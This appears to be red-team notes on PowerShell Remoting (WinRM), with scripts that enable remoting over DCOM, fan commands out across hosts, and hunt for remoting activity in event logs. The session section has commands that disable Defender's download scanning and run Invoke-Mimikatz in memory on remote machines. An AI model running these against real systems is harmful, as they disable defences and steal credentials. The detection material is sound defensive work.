Powershell Remoting - WinRM

By default, the account used must have local administrator rights on the target machine (the default session configuration also admits members of the Remote Management Users group).

Windows Remote Management (WinRM) is Microsoft's implementation of the WS-Management protocol (SOAP over HTTP(S)). It is used for remote server and hardware management, it is how PowerShell Remoting carries its traffic, and it exposes WMI over HTTP(S) as well. Unlike ordinary web traffic it does not use ports 80/443, but TCP 5985 (HTTP) and 5986 (HTTPS).

WinRM ships with Windows but needs to be configured before it can be used. The exception is server operating systems: PowerShell Remoting has been enabled by default since Windows Server 2012.

A WinRM listener must be running on the target before a connection can be made. It can be enabled locally with the following command from an elevated PowerShell prompt, or remotely by running the same command through WMI/DCOM:

Enable-PSRemoting -Force
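The remote variant described above, as an added example that is not part of the original page: the listener is switched on over WMI/DCOM (TCP 135 plus dynamic RPC ports, so no WinRM listener is needed yet), then the host is polled until WinRM answers. `$Target` and `$Cred` are assumed placeholders; local administrator rights on the target are required.

```powershell
# Added example (not from the original page). Enable the WinRM listener on a host
# that has no PS Remoting yet, by spawning powershell.exe through Win32_Process
# over DCOM, then wait until the WinRM service answers. Needs local admin on $Target.
$Target = 'SRV01.corp.local'                      # assumed placeholder
$Cred   = Get-Credential -Message "Admin account for $Target"

# DCOM session: this path does not depend on WinRM being up on the target.
$cimOpt = New-CimSessionOption -Protocol Dcom
$cim    = New-CimSession -ComputerName $Target -Credential $Cred -SessionOption $cimOpt

# Win32_Process.Create runs under the WMI provider host; the child process enables
# remoting. -SkipNetworkProfileCheck avoids the failure on a "Public" network profile.
$cmd = 'powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Enable-PSRemoting -Force -SkipNetworkProfileCheck"'
$result = Invoke-CimMethod -CimSession $cim -ClassName Win32_Process -MethodName Create `
              -Arguments @{ CommandLine = $cmd }

if ($result.ReturnValue -ne 0) {
    throw "Win32_Process.Create failed on $Target with return code $($result.ReturnValue)"
}
Write-Host "Spawned PID $($result.ProcessId) on $Target, waiting for the WinRM listener..."

# Poll the WS-Management Identify endpoint on 5985 until it responds (max 60 s).
$deadline = (Get-Date).AddSeconds(60)
do {
    Start-Sleep -Seconds 5
    $id = Test-WSMan -ComputerName $Target -Credential $Cred -Authentication Negotiate `
              -ErrorAction SilentlyContinue
} until ($id -or (Get-Date) -gt $deadline)

Remove-CimSession $cim
if (-not $id) { throw "WinRM still not reachable on $Target after 60 s" }
"{0}: WinRM answering, {1}" -f $Target, $id.ProductVersion
```

Test-WSMan without credentials only returns the stack version; with `-Credential` and `-Authentication` it also confirms that the account can actually authenticate to the listener, which is the check you want before relying on the new session.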

With Windows PowerShell:

  1. Create a session (Enter-PSSession drops you into an interactive prompt on the target; for the non-interactive commands in the next step, keep using `$sess`):

$sess = New-PSSession -ComputerName <TARGET_COMPUTER>
Enter-PSSession -Session $sess
  2. Execute commands in the opened session:

# Run "whoami" on a list of machines (one Invoke-Command fans the script block out in parallel)
Invoke-Command -ScriptBlock {whoami} -ComputerName (Get-Content <list_of_servers>)

# Run a command in the created session (DisableIOAVProtection controls whether Windows Defender scans downloaded files and attachments)
Invoke-Command -ScriptBlock {Set-MpPreference -DisableIOAVProtection $true} -Session $sess

# Run a local script in the remote session: its content is sent over the wire and executed in memory, nothing is written to the target's disk
Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimikatz.ps1 -Session $sess

# Send the body of a function that is already loaded locally as a script block
Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess
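The two steps above (open sessions, run commands in them) put together as an added example, not code from the original page: explicit credentials, a host list, per-host failure reporting, results tagged with the originating computer, and session cleanup. `servers.txt` and `$Cred` are assumed inputs.

```powershell
# Added example (not from the original page): the session procedure against a
# list of hosts, with error handling and cleanup. 'servers.txt' is an assumed
# input file with one hostname per line; lines starting with '#' are skipped.
$Cred    = Get-Credential -Message 'Account with remote admin rights'
$targets = Get-Content .\servers.txt | Where-Object { $_ -and -not $_.StartsWith('#') }

# Hostnames/FQDNs in the domain authenticate with Kerberos. An IP address forces
# NTLM and the client's TrustedHosts list must then allow the target.
$failed   = @()
$sessions = New-PSSession -ComputerName $targets -Credential $Cred `
                -ErrorAction SilentlyContinue -ErrorVariable +failed

foreach ($e in $failed) {
    # The message already names the host that could not be reached.
    Write-Warning $e.Exception.Message
}
if (-not $sessions) { throw 'No session could be opened' }

try {
    # One Invoke-Command runs the script block on every session in parallel
    # (32 at a time by default). Each returned object carries PSComputerName,
    # so output from different hosts stays attributable.
    $results = Invoke-Command -Session $sessions -ScriptBlock {
        $principal = [Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()
        [pscustomobject]@{
            User    = whoami
            IsAdmin = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
            Host    = $env:COMPUTERNAME
        }
    }
    $results | Select-Object PSComputerName, User, IsAdmin | Format-Table -AutoSize
}
finally {
    # Every open session keeps a wsmprovhost.exe alive on its target until it is closed.
    $sessions | Remove-PSSession
}
```

The `finally` block matters operationally as much as for hygiene: lingering sessions are exactly the long-lived `wsmprovhost.exe` processes that the detection section below describes.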

Detection:

On the source host, look for outbound network connections with a destination port of 5985/5986. On the target, look for the process start event of wsmprovhost.exe (spawned by the svchost.exe that hosts the WinRM service, with "-Embedding" in the command line). The same activity shows up as a network logon (Security event 4624, logon type 3) and, in the Microsoft-Windows-WinRM/Operational log, as event 91 ("Creating WSMan shell on server") for each session that is opened.
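The checks described above, turned into a hunting script as an added example (not part of the original page). It reads the Security and WinRM/Operational logs on the host it runs on, so it needs an elevated prompt, and the command line in event 4688 is only populated when process command-line auditing is enabled. `$Since` is an assumed lookback window.

```powershell
# Added example (not from the original page): hunt for the WinRM/PS Remoting
# artefacts on a target host. Run elevated. $Since is an assumed 24 h window.
$Since = (Get-Date).AddHours(-24)

# 1. Provider host started for an incoming shell: wsmprovhost.exe -Embedding.
#    4688 EventData: [5]=NewProcessName [8]=CommandLine [13]=ParentProcessName
$spawns = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $Since } -ErrorAction SilentlyContinue |
    Where-Object { $_.Properties[5].Value -like '*\wsmprovhost.exe' } |
    ForEach-Object {
        [pscustomobject]@{
            Time        = $_.TimeCreated
            Process     = $_.Properties[5].Value
            CommandLine = $_.Properties[8].Value    # empty unless command-line auditing is on
            Parent      = $_.Properties[13].Value   # expected: svchost.exe (WinRM service)
        }
    }

# 2. Server-side WinRM log: event 91 is written once per WSMan shell created.
$shells = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-WinRM/Operational'; Id = 91; StartTime = $Since } -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, UserId, Message

# 3. Network logons (type 3) to pair with the wsmprovhost start times.
#    4624 EventData: [5]=TargetUserName [6]=TargetDomainName [8]=LogonType [18]=IpAddress
$logons = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624; StartTime = $Since } -ErrorAction SilentlyContinue |
    Where-Object { $_.Properties[8].Value -eq 3 } |
    Select-Object TimeCreated,
        @{ n = 'User';   e = { "$($_.Properties[6].Value)\$($_.Properties[5].Value)" } },
        @{ n = 'Source'; e = { $_.Properties[18].Value } }

# 4. Live view: established connections on 5985/5986, inbound (target) or outbound (source).
$conns = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue |
    Where-Object { $_.RemotePort -in 5985, 5986 -or $_.LocalPort -in 5985, 5986 } |
    Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, OwningProcess

"wsmprovhost starts: {0}; WSMan shells (evt 91): {1}; type-3 logons: {2}; live 5985/5986 connections: {3}" -f
    @($spawns).Count, @($shells).Count, @($logons).Count, @($conns).Count
$spawns | Format-Table -AutoSize
$conns  | Format-Table -AutoSize
```

Correlate by time: a wsmprovhost.exe start a few seconds after a type-3 logon from the same source address, with a matching event 91, is the signature of a remoting session being opened, whether by an administrator or by an attacker using the commands in the previous section.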
